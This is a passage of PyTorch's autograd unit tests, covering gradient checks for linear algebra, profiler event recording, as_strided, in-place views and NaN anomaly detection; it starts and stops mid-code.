torch.randn(3, 4, 6, 3, requires_grad=True) r1 = var1 * var1 * mean1 * mean1 r2 = var2 * var2 * mean2 * mean2 self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0)) torch.autograd.backward(r1, grad) torch.autograd.backward(r2, grad) self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0)) @slowTest @skipIfNoLapack def test_lobpcg(self): def func(k, A, largest=True, B=None): X_shape = list(A.shape) X_shape[-1] = k X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device) if A.dim() > 2: X = X.expand(X_shape) D, U = torch.lobpcg(A=A, k=k, B=B, X=X) # LOBPCG uses a random initial eigenspace approximation # if parameter `X` is not provided. # This may cause a non-deterministic behavior # when it comes to the sign of an eigenvector # (note if v is an eigenvector, so is -v), # hence we eliminate this non-determinism # by making sure that each column of U # gets multiplied by the sign of its max (in absolute value) element. # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06) # to compute the numerical gradient which can also cause the signs to flip. _, idx = U.abs().max(-2, keepdim=True) sign = U.gather(-2, idx).sign() U = U * sign return D, U def run_symeig_test(k, sizes, largest=True): A = torch.rand(*sizes).double() A = A.matmul(A.transpose(-1, -2)) / 10 A.requires_grad_(True) gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False) # Custom gradient vectors for better stability due to some # non-determinism in the lobpcg's forward. # Note it is not required if symeig is in forward instead (tested). 
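# A minimal, standalone sketch of the sign-canonicalization used in `func` above:
# since v and -v are equally valid eigenvectors, every column of U is rescaled by
# the sign of its largest-magnitude entry, so U and -U map to the same canonical
# matrix. The random U below is only an illustrative stand-in, not actual
# torch.lobpcg output.
import torch

def canonicalize_signs(U):
    _, idx = U.abs().max(-2, keepdim=True)   # row index of the max-|entry| per column
    return U * U.gather(-2, idx).sign()      # flip columns whose pivot entry is negative

U = torch.randn(4, 2)
assert torch.equal(canonicalize_signs(U), canonicalize_signs(-U))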
D_grad = torch.rand(*A.shape[:-2], k) / 100 U_grad = torch.rand(*A.shape[:-1], k) / 100 gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False) # check whether A.grad is symmetric A = A.detach().requires_grad_(True) D, U = func(k, A, largest) (D.sum() + U.sum()).backward() self.assertEqual(A.grad, A.grad.transpose(-1, -2)) # the tests below take about 1-2 minutes to finish, # but we want to be extra sure that the backward is correct. for largest in [True, False]: run_symeig_test(1, (6, 6), largest=largest) run_symeig_test(1, (2, 6, 6), largest=largest) run_symeig_test(1, (2, 2, 6, 6), largest=largest) run_symeig_test(2, (6, 6), largest=largest) run_symeig_test(2, (2, 6, 6), largest=largest) run_symeig_test(2, (2, 2, 6, 6), largest=largest) run_symeig_test(3, (9, 9), largest=largest) run_symeig_test(3, (2, 9, 9), largest=largest) run_symeig_test(3, (2, 2, 9, 9), largest=largest) def test_variable_traverse(self): def get_out_and_unrefed_cycle(): inp = torch.randn(10, requires_grad=True) tmp = inp.view(10, 1) out = tmp.view(10) # Create a reference cycle that contains an # intermediary Variable in the graph my_list = [] my_list.append(tmp) my_list.append(my_list) return out out = get_out_and_unrefed_cycle() gc.collect() # This will segfault if things have been erroneously released out.backward(torch.randn(out.size())) def test_norm_subgradient(self): def run_test(input_size, norm_deg): input = torch.zeros(*input_size, requires_grad=True) input.norm(norm_deg).backward() self.assertEqual(input.grad.abs().sum(), 0) run_test((10,), 2) run_test((10, 10), 2) run_test((10,), 3) run_test((10,), 1) run_test((10,), 1.5) run_test((10,), inf) def test_norm_inf_subgradient(self): def run_test(input, expected, dim=None): x = torch.tensor(input, requires_grad=True) out = x.norm(inf, dim=dim, keepdim=True) out.backward(torch.ones(out.size())) self.assertEqual(x.grad, expected) run_test([0., 0., 0.], [0., 0., 0.]) run_test([1., 0., 1.], [0.5, 0., 0.5]) run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]]) run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,)) run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2)) def test_pow_zero_tensor_gradient(self): def run_test(input_size, exponent): input = torch.zeros(*input_size, requires_grad=True) input.pow(exponent).sum().backward() self.assertEqual(input.grad.abs().sum(), 0) run_test((10,), torch.zeros(10)) run_test((10, 10), torch.zeros(10, 10)) run_test((10,), 0) def test_pow_scalar_base(self): a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_() gradcheck(lambda a: torch.pow(2, a), (a,)) def test_sinc(self): # The derivative of sinc(x) at x=0 has to be special cased. # A naive computation will result in 0/0 -> NaN. # We also need to be careful when we are very close to 0, as the # derivative's denominator is squared, and there are some floats # that are positive and whose squares are zero. 
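# A small standalone illustration of why the derivative of sinc needs the special
# casing described in the comment above. torch.sinc(x) = sin(pi*x) / (pi*x), so the
# naive closed-form derivative (pi*x*cos(pi*x) - sin(pi*x)) / (pi*x**2) is 0/0 at
# x == 0 (the true limit there is 0), and for a tiny subnormal x the x**2 in the
# denominator underflows to 0.0 as well. `naive_dsinc` is a hypothetical helper
# written only for this sketch, not a PyTorch API.
import math
import torch

def naive_dsinc(x):
    px = math.pi * x
    return (px * torch.cos(px) - torch.sin(px)) / (math.pi * x ** 2)

x = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0], dtype=torch.double)
print(naive_dsinc(x))  # nan at 0.0; at tiny the denominator has underflowed to 0.0
print(torch.where(x == 0, torch.zeros_like(x), naive_dsinc(x)))  # special-cased at exactly 0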
        a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
                         dtype=torch.double,
                         requires_grad=True)
        gradcheck(torch.sinc, a)

    def test_igamma(self):
        # 1e-3 offset to avoid zeros
        # NOTE: derivative for s is not implemented
        s = (torch.rand(100, dtype=torch.double) + 1e-3)
        x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
        gradcheck(torch.igamma, (s, x))
        gradgradcheck(torch.igamma, (s, x))

    def test_igammac(self):
        # 1e-3 offset to avoid zeros in s
        # NOTE: derivative for s is not implemented
        s = (torch.rand(100, dtype=torch.double) + 1e-3)
        x = (torch.rand(100, dtype=torch.double)).requires_grad_()
        gradcheck(torch.igammac, (s, x))
        gradgradcheck(torch.igammac, (s, x))

    def test_profiler(self):
        x = torch.randn(10, 10)

        with profile(use_kineto=kineto_available()) as p:
            self.assertTrue(torch.autograd._profiler_enabled())
            y = x * 2 + 4
        self.assertFalse(torch.autograd._profiler_enabled())

        names = ['aten::mul', 'aten::add']
        found_indices = set()
        for evt in p.function_events:
            if evt.name in names:
                found_indices.add(names.index(evt.name))
        self.assertEqual(len(found_indices), len(names))

    def test_profiler_seq_nr(self):
        with profile(use_kineto=kineto_available()) as p:
            x = torch.randn(10, 10, requires_grad=True)
            y = torch.randn(10, 10, requires_grad=True)
            z = x + y
            s = z.sum()
            s.backward()
        print(p.key_averages().table(
            sort_by="self_cpu_time_total", row_limit=-1))
        # expecting aten::add, aten::sum to have the sequence numbers,
        # expecting the corresponding backward nodes to have the same numbers
        # as the forward ops
        add_seq_nr = -1
        sum_seq_nr = -1
        found_add = found_sum = False
        found_bwd_add = found_bwd_sum = False
        found_empty = False
        for e in p.function_events:
            if e.name == "aten::add":
                add_seq_nr = e.sequence_nr
                self.assertFalse(found_add)
                found_add = True
            elif e.name == "aten::sum":
                sum_seq_nr = e.sequence_nr
                self.assertFalse(found_sum)
                found_sum = True
            elif "Add" in e.name and "Backward" in e.name:
                self.assertEqual(e.sequence_nr, add_seq_nr)
                self.assertFalse(found_bwd_add)
                found_bwd_add = True
            elif "Sum" in e.name and "Backward" in e.name:
                self.assertEqual(e.sequence_nr, sum_seq_nr)
                self.assertFalse(found_bwd_sum)
                found_bwd_sum = True
            # check that nested ops (e.g.
empty) don't have # sequence number if e.name == "aten::empty": self.assertEqual(e.sequence_nr, -1) found_empty = True self.assertGreaterEqual(add_seq_nr, 0) self.assertGreaterEqual(sum_seq_nr, 0) self.assertNotEqual(add_seq_nr, sum_seq_nr) self.assertTrue(found_add) self.assertTrue(found_sum) self.assertTrue(found_bwd_add) self.assertTrue(found_bwd_sum) self.assertTrue(found_empty) def test_profiler_unboxed_only(self): x = torch.rand(3, 4) with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof: x.resize_([3, 2]) def test_profiler_propagation(self): def foo(x): with record_function("in_foo") as rf: return x * 2 x = torch.rand(3, 4) traced_foo = torch.jit.trace(foo, x) def bar(x): with record_function("in_bar") as rf: # we expect that profiler will be able # propagate across fork fut = torch.jit._fork(traced_foo, x) y = torch.jit._wait(fut) # note: continuation (and rf's end) can # be executed in a different thread with record_function("in_bar_after_wait") as rf2: y = y * 2 return y traced_bar = torch.jit.trace(bar, x) with profile(use_kineto=kineto_available()) as p: traced_bar(x) found_foo = False found_bar = False found_bar_after_wait = False for info in p.function_events: if info.name == "in_foo": self.assertFalse(found_foo) found_foo = True elif info.name == "in_bar": self.assertFalse(found_bar) found_bar = True elif info.name == "in_bar_after_wait": self.assertFalse(found_bar_after_wait) found_bar_after_wait = True self.assertTrue(found_foo) self.assertTrue(found_bar) self.assertTrue(found_bar_after_wait) def test_record_function_callbacks(self): x = torch.randn(10, 10) with profile(use_kineto=kineto_available()) as p: with record_function("foo"): y = x * 2 + 4 function_events = p.function_events foo_event = [event for event in function_events if "foo" in event.name][0] self.assertEqual(foo_event.count, 1) def test_profiler_aggregation_fake(self): events = EventList() id = [0] def get_id(): id[0] = id[0] + 1 return id[0] # [[thread_id, [(start, end, id), ....]], ...] # Using list instead of a dict so order is guaranteed for any Python # version threads = [ [1, [(0, 1, get_id()), (1, 2, get_id())]], [0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]], ] for thread, ranges in threads: for range in ranges: assert(len(range) == 3) events.append( FunctionEvent( id=range[2], node_id=0, name="", thread=thread, start_us=range[0], end_us=range[1], ) ) events._populate_cpu_children() # Note that [1, 3] pushes out [0, 2] first. 
Then we record [1, 2] # as a child of [1, 3] res = [[], [], [], [], [4]] def get_children_ids(event): return [child.id for child in event.cpu_children] assert([get_children_ids(event) for event in events] == res) def test_profiler_aggregation_table(self): """ Test if the profiling result is aggregated for `str(prof)` See: https://github.com/pytorch/pytorch/issues/37500 """ x = torch.randn(1024) with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof: torch.einsum("i->", x) prof_str = str(prof) prof_table = prof.table() self.assertEqual(prof_table, prof_str) def test_profiler_function_event_avg(self): avg = FunctionEventAvg() avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15)) avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30)) avg.add(avg) self.assertEqual(avg.key, "foo") # aggregate stats self.assertEqual(avg.count, 4) self.assertEqual(avg.cpu_time_total, 30) self.assertEqual(avg.self_cpu_time_total, 30) self.assertEqual(avg.cuda_time_total, 0) # average stats self.assertEqual(avg.cpu_time, 7.5) self.assertEqual(avg.cuda_time_total, 0) def test_profiler_shapes(self): print("") layer1 = torch.nn.Linear(20, 30) layer2 = torch.nn.Linear(30, 40) input = torch.randn(128, 20) with profile(record_shapes=True, use_kineto=kineto_available()) as prof: layer2(layer1(input)) print(prof.function_events) linear_expected_shapes = [ [[128, 20], [30, 20], [30]], [[128, 30], [40, 30], [40]], ] found_indices = set() for event in prof.function_events: if event.name == "aten::linear": self.assertTrue(event.input_shapes in linear_expected_shapes) found_indices.add(linear_expected_shapes.index(event.input_shapes)) self.assertEqual(len(found_indices), len(linear_expected_shapes)) def test_profiler_aggregation_lstm(self): print("") rnn = torch.nn.LSTM(10, 20, 2) total_time_s = 0 with profile(record_shapes=True, use_kineto=kineto_available()) as prof: for i in range(20): input = torch.randn(5, 3, 10) h = torch.randn(2, 3, 20) c = torch.randn(2, 3, 20) start = time.time() rnn(input, (h, c)) end = time.time() total_time_s += end - start print(prof.table( sort_by="self_cpu_time_total", row_limit=10, header="TEST")) print(prof.key_averages(group_by_input_shape=True).table( sort_by="self_cpu_time_total", row_limit=10)) print(prof.table( sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True)) print(prof.key_averages(group_by_input_shape=True).table( sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True)) total_time_us = total_time_s * 1000.0 * 1000.0 # make it us which is profiler default print( "Total time based on python measurements: ", format_time(total_time_us) ) print( "CPU time measurement python side overhead: {:.2f}%".format( (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0 ) ) if sys.platform != "win32": with tempfile.NamedTemporaryFile() as trace_file: prof.export_chrome_trace(trace_file.name) def test_record_function(self): x = torch.randn(10, 10) def forward(x): with record_function("outer"): y = x * 2 + 4 with record_function("inner"): y = y - 1 y = y / 1 forward(x) with profile(use_kineto=kineto_available()) as p: forward(x) events = p.function_events important_events = [ 'outer', 'aten::mul', 'aten::add', 'inner', 'aten::sub', 'aten::div' ] idx = 0 for info in events: if info.name == important_events[idx]: idx = idx + 1 if idx == len(important_events): break self.assertEqual(idx, len(important_events)) # We can also use 
record_function to decorate arbitrary function @record_function('my_func') def f(x, y): return x + y with profile(use_kineto=kineto_available()) as p: f(1, 2) self.assertTrue('my_func' in str(p)) def test_record_function_multithreaded(self): rf = record_function("outer") rf.__enter__() with record_function("inner"): # test that exiting the record function after starting another one # doesn't throw. rf.__exit__(None, None, None) with record_function("inner"): rf.__enter__() # test that exiting the record function after ending another one # doesn't throw. rf.__exit__(None, None, None) def test_dir(self): x = torch.randn(10, 10) keys = dir(x) self.assertIn('shape', keys) # real and imag are only implemented for complex tensors. y = torch.randn(10, 10, dtype=torch.cfloat) for key in ['real', 'imag']: self.assertRaises(RuntimeError, lambda: hasattr(x, key)) self.assertTrue(hasattr(y, key)) keys.remove(key) for key in keys: self.assertTrue(hasattr(x, key)) def test_as_strided(self): def test(x, prepro_fn, size, strides, offset=None): x = x.to(torch.double).detach().requires_grad_() # Check that forward will **not** resize storage because it may # cause NaN in output and fail numerical Jacobian check consequently with torch.no_grad(): y = prepro_fn(x) if prepro_fn is not None else x max_offset = sum((si - 1) * st for si, st in zip(size, strides)) max_offset += offset if offset is not None else y.storage_offset() assert max_offset < len(y.storage()), "test case resizes storage" def closure(x): if prepro_fn is not None: x = prepro_fn(x) return x.as_strided(size, strides, offset) gradcheck(closure, [x]) gradgradcheck(closure, [x]) # test test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2) # test crazy stride at dim with size 1 case test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2) # test expand case test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2) test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4) test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0) # test non-expand overlapping case test(torch.randn(35), None, [6, 6], [5, 1], 2) test(torch.randn(15), None, [3, 2], [3, 6], 2) # test transpose case test(torch.randn(3, 4), None, [4, 3], [1, 4]) # test "getting things outside the input" case x = torch.randn(6, 2) test(x[3:], None, [3, 2], [2, 1], 0) # should be all zeros self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3]) # test select on expanded input case test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0) def _test_lerp_tensor_weights(self, cast): def construct_inputs(*shapes): start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_() end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_() weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_() return [start, end, weight] all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting ((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1 ((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1 ((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1 ((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2 ((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2 ((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2 ((3, 3), (3, 3, 3), (3,))] # all broadcasting for shapes in all_test_shapes: cur_inputs = construct_inputs(*shapes) gradcheck(torch.lerp, cur_inputs) gradgradcheck(torch.lerp, cur_inputs) def test_lerp_tensor_weights(self): self._test_lerp_tensor_weights(lambda t: t) def test_reduce_dtype(self): def test_reduction(op, 
has_no_dim, takes_dtype=True): x = torch.randn(3, 3, dtype=torch.float, requires_grad=True) if has_no_dim: grad1, = torch.autograd.grad([op(x)], [x]) grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x]) self.assertEqual(grad1, grad2) self.assertEqual(grad2.dtype, torch.float) gi = torch.randn(op(x, dim=0).shape, dtype=torch.float) grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi) if takes_dtype: grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double()) else: grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double()) self.assertEqual(grad1, grad2) self.assertEqual(grad2.dtype, torch.float) test_reduction(torch.sum, True) test_reduction(torch.prod, True) test_reduction(torch.cumsum, False) test_reduction(torch.cumprod, False) test_reduction(torch.logcumsumexp, False, takes_dtype=False) def test_inplace_view_saved_output(self): # Test an in-place operation on a view in which the in-place op saves # its output. Previously, this created a reference cycle. dealloc = [0] class IncrementOnDelete(object): def __del__(self): dealloc[0] += 1 def test(): root = torch.randn(3, 3, requires_grad=True) copy = root.clone() copy.grad_fn.register_hook(IncrementOnDelete()) view = copy.view(9) torch.nn.functional.relu(view, inplace=True) test() self.assertEqual(dealloc[0], 1) def test_inplace_view_leaf_errors(self): # Issue #21875: Fail faster (when we try to modify the view vs. in backward()) x = torch.zeros(1, requires_grad=True) y = x.view_as(x) with self.assertRaisesRegex(RuntimeError, "a view of a leaf Variable that " "requires grad is being used in " "an in-place operation."): y.add_(1) def test_inplace_view_backward(self): # Issue #10532: Make sure that this does not raise RuntimeError. net = nn.Sequential( nn.InstanceNorm2d(2), nn.ReLU(True) ) x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True) g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True) torch.autograd.grad(g.sum(), [x]) self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]])) # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8 inputs = torch.ones((1, 3, 256, 256), requires_grad=True) tmp1 = (inputs + 1).view_as(inputs) tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True) prob_interpolated = torch.sigmoid(tmp2) gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs, grad_outputs=torch.ones(prob_interpolated.size()), create_graph=True, retain_graph=True)[0] gradient_penalty = gradients.sum() gradient_penalty.backward() fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0] self.assertEqual(fn.name(), "ThresholdBackwardBackward") def test_inplace_view_weak_grad_fn(self): # Issue 23502: Test that b's grad_fn is preserved. a = torch.arange(10.0, requires_grad=True) b = a.narrow(0, 0, 2).clone().view(-1) b.relu_() c = b.clone() del b gc.collect() s = c.sum() s.backward() self.assertEqual(s, torch.tensor(1.0)) # Issue #21875: Fail faster (when we try to modify the view vs. in backward()) a = torch.rand(10, requires_grad=True).narrow(0, 0, 10) with self.assertRaises(RuntimeError): b = a.relu_() def test_mul_out(self): a = torch.randn(2, 2, requires_grad=True) b = torch.randn(2, 2, requires_grad=True) x = torch.zeros_like(a) # out=... 
functions don't support automatic differentiation currently self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x)) # the inputs can require grad if we're in no_grad() mode with torch.no_grad(): torch.mul(a, b, out=x) self.assertEqual(x, a * b) def test_mul_out_result_requires_grad(self): a = torch.randn(2, 2) b = torch.randn(2, 2) x = torch.zeros(2, 2, requires_grad=True) # we should throw an exception if the output requires grad self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x)) def test_diagonal_derivative_requires_grad(self): # test that the backward requires grad # we do this is because diagonal_backward uses inplace # operations and gradgradcheck does not catch whether # they works as expected (it will succeed even if # the gradient has requires_grad == False a = torch.randn(5, 6, requires_grad=True) b = torch.diagonal(a)**2 c = b.sum() d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True) self.assertTrue(d.requires_grad) def test_anomaly_detect_nan(self): size = 10 class MyFunc(Function): @staticmethod def forward(ctx, inp1, inp2, fail_0th): ctx.fail_0th = fail_0th return inp1.sum(0, keepdim=True) @staticmethod def backward(ctx, gO): gI = gO.clone().expand(size) gI[0] = 0 gI[0] /= 0 # Generate a nan if ctx.fail_0th: return gI, None, None else: return None, gI, None inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, inp, True) out.backward() # Should not fail inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, inp, True) with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): out.backward() self.assertIn('No forward pass information', str(w[0].message)) inp = torch.rand(size, requires_grad=True) with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): out = MyFunc.apply(inp, inp, False) out.backward() self.assertIn('MyFunc.apply', str(w[0].message)) def test_nested_anomaly_detect_nan(self): size = 10 class MyFunc(Function): @staticmethod def forward(ctx, inp1, fail_0th): ctx.fail_0th = fail_0th ctx.save_for_backward(inp1) return inp1.sum(0, keepdim=True) @staticmethod def backward(ctx, gO): inp, = ctx.saved_tensors fail_0th = ctx.fail_0th g = gO.clone().expand(size) gI = MyFunc2.apply(g * inp, g + inp, fail_0th) return gI, None class MyFunc2(Function): @staticmethod def forward(ctx, inp1, inp2, fail_0th): ctx.fail_0th = fail_0th return inp1 * 2.0 + inp2 @staticmethod def backward(ctx, gO): fail_0th = ctx.fail_0th g1 = gO.clone() g2 = gO.clone() g1[0] = 0 g2[0] = 0 # generate a nan if fail_0th: g1[0] /= 0 else: g2[0] /= 0 return g1, g2, None inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, True) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() gsum.backward() # should not fail inp = torch.rand(size, requires_grad=True) out = MyFunc.apply(inp, True) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() with warnings.catch_warnings(record=True) as w: with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."): with detect_anomaly(): gsum.backward() self.assertIn('No forward pass information', str(w[1].message)) inp = torch.rand(size, requires_grad=True) with warnings.catch_warnings(record=True) as w: with 
self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."): with detect_anomaly(): out = MyFunc.apply(inp, False) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) gsum = ginp.sum() gsum.backward() self.assertIn('MyFunc2.apply', str(w[1].message)) self.assertIn('MyFunc.apply', str(w[2].message)) def test_anomaly_grad_warnings(self): # PyTorch won't throw warnings if there is an error # but we'd want to at least see them in stderr class StdErrDiverter: def __enter__(self): self.stderr_orig = sys.stderr self.stderr_new = io.StringIO() sys.stderr = self.stderr_new return self def __exit__(self, *args): self.captured = self.stderr_new.getvalue() sys.stderr = self.stderr_orig # if the warnings don't throw, they will be handled as regular warnings with self.assertRaisesRegex(RuntimeError, "one of the variables needed for gradient computation has been " "modified by an inplace operation"): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): a = torch.randn(5, requires_grad=True) d1 = a + 1 d2 = d1 ** 2 d1 += 1 torch.autograd.grad(d2.sum(), a) self.assertEqual(len(w), 2) self.assertIn('Anomaly Detection has been enabled', str(w[0].message)) self.assertIn('Error detected in PowBackward0', str(w[1].message)) # if the warning throws, it will be printed to sys.stderr with self.assertRaisesRegex(RuntimeError, "one of the variables needed for gradient computation has been " "modified by an inplace operation"): with warnings.catch_warnings(record=True) as w: with detect_anomaly(): warnings.simplefilter("error") with StdErrDiverter() as s: a = torch.randn(5, requires_grad=True) d1 = a + 1 d2 = d1 ** 2 d1 += 1 torch.autograd.grad(d2.sum(), a) self.assertEqual(len(w), 1) self.assertIn('Anomaly Detection has been enabled', str(w[0].message)) self.assertIn('Error detected in PowBackward0', s.captured) def test_anomaly_assign_parent_cleanup(self): # Test that python objects created are properly cleaned up when assign_parent is called import weakref def get_ref(): # we use torch.exp here but any function that will construct a new node in its # backward call in grad mode will work x = torch.randn(2, 2, requires_grad=True) t = x.exp() # ExpBackward calls mul, creating the MulBackward node when create_graph=True. 
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to # MulBackward's anomaly metadata dict, creating the following reference chain: # # grad -> MulBackward -> PyObject -> ExpBackward # with detect_anomaly(): grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True) # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict # # (PyObject) -> ExpBackward -> dict -> *Foo* # t ----^ WeakRef ---^ # # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed # We can test this by seeing whether Foo is not kept alive once t is destroyed class Foo(object): pass my_obj = Foo() meta_dict = t.grad_fn.metadata meta_dict[0] = my_obj ref = weakref.ref(my_obj) return t, ref t, ref = get_ref() self.assertIsNotNone(ref()) del t self.assertIsNone(ref()) def test_nested_anomaly_printstack_cleanup(self): # Test if metadata dict PyObject is properly destroyed import weakref def get_ref(): # This is similar to the construction in test_anomaly_assign_parent_cleanup: # # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo # out ---^ WeakRef ---^ # # We want to check that Foo is still properly destroyed even when MyFunc2Backward's # AnomalyMetadata calls printstack, which does some python object manipulation. # # You might be wondering why we still have to test_anomaly_assign_parent_cleanup, # since if PyObject is not destroyed here, wouldn't this test would detect that also? # The answer is that custom function's PyObject (THPFunction) actually only hold # a weak reference to the c++ node! class MyFunc(Function): @staticmethod def forward(ctx, x): ctx.save_for_backward(x) return x @staticmethod def backward(ctx, gO): x, = ctx.saved_tensors return MyFunc2.apply(x) class MyFunc2(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, gO): return gO + float("NaN") inp = torch.rand(1, requires_grad=True) out = MyFunc.apply(inp) ginp, = torch.autograd.grad(out, (inp,), create_graph=True) with warnings.catch_warnings(record=True) as w: with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."): with detect_anomaly(): ginp.backward() class Foo(object): pass my_obj = Foo() meta_dict = out.grad_fn.metadata meta_dict[0] = my_obj ref = weakref.ref(my_obj) return out, ref t, ref = get_ref() self.assertIsNotNone(ref()) del t self.assertIsNone(ref()) @skipIfNoLapack def test_eig_no_eigenvectors(self): A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True) w, v = torch.eig(A, eigenvectors=False) with self.assertRaisesRegex(RuntimeError, 'is not differentiable'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_eig_complex_eigenvalues(self): A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True) w, v = torch.eig(A, eigenvectors=True) with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_symeig_no_eigenvectors(self): A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True) w, v = torch.symeig(A, eigenvectors=False) with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'): torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)]) @skipIfNoLapack def test_svd_no_singularvectors(self): A = torch.randn(2, 2, dtype=torch.float32, 
requires_grad=True) u, s, v = torch.svd(A, compute_uv=False) with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'): torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)]) def test_no_grad_copy(self): # create autograd function that saves grad pointer as class static class MyFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): MyFunc.static_grad_ptr = grad.data_ptr() return grad, grad class NonContGradFunc(Function): @staticmethod def forward(ctx, inp1): ctx.size = inp1.size() return torch.tensor([1.]) @staticmethod def backward(ctx, grad): return torch.ones(1).expand(ctx.size) a = torch.randn(5, 6, requires_grad=True) b = torch.randn(5, 6, requires_grad=True) # non-contiguous grad should be copied NonContGradFunc.apply(MyFunc.apply(a, b)).backward() self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr) self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr) # test case that should trigger no copy for one of a,b a.grad = b.grad = None MyFunc.apply(a, b)[1][0].backward() p_g = MyFunc.static_grad_ptr p_a = a.grad.data_ptr() p_b = b.grad.data_ptr() # check a,b uses different grad buffer self.assertFalse(p_a == p_b) # check one of them is using the computed buffer self.assertTrue(p_a == p_g or p_b == p_g) def test_no_grad_copy_sparse(self): # create autograd function that saves grad pointer as class static class MyFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): MyFunc.static_grad_ptr = grad._values().data_ptr() return grad, grad class NonContGradFunc(Function): static_grad_ptr = None @staticmethod def forward(ctx, inp1, inp2): return inp1 + inp2 @staticmethod def backward(ctx, grad): # Create a sparse tensor with non-contigous indices and values # and return as grad. v = torch.rand(1, 3) i = torch.ones(1, 1, dtype=torch.long) nv = v.expand(8, 3) ni = i.expand(1, 8) ngrad = 